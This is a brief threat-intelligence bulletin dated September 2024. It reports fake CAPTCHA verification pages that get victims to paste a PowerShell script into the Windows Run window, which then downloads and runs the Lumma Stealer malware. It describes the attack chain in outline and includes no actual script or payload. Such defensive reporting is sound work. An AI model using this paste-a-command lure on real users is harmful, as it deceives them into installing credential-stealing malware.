Fake human captcha style verification pages lead to copy/paste script for lumma stealer

Intel Name: Fake human captcha style verification pages lead to copy/paste script for lumma stealer

Date of Scan: September 2, 2024

Impact: High

Summary:
As of August 27, 2024, fake verification pages are being used to spread Lumma Stealer malware. These pages prompt victims to paste a PowerShell script into a Run window, which then downloads and executes the Lumma Stealer EXE. The malware retrieves and uses zip archives that don’t appear malicious on their own. This attack is similar to activity reported in June 2024, detailed here: [Unit42 Timely Threat Intel](https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-06-24-IOCs-for-ClickFix-pushing-Lumma-Stealer.txt).

More Details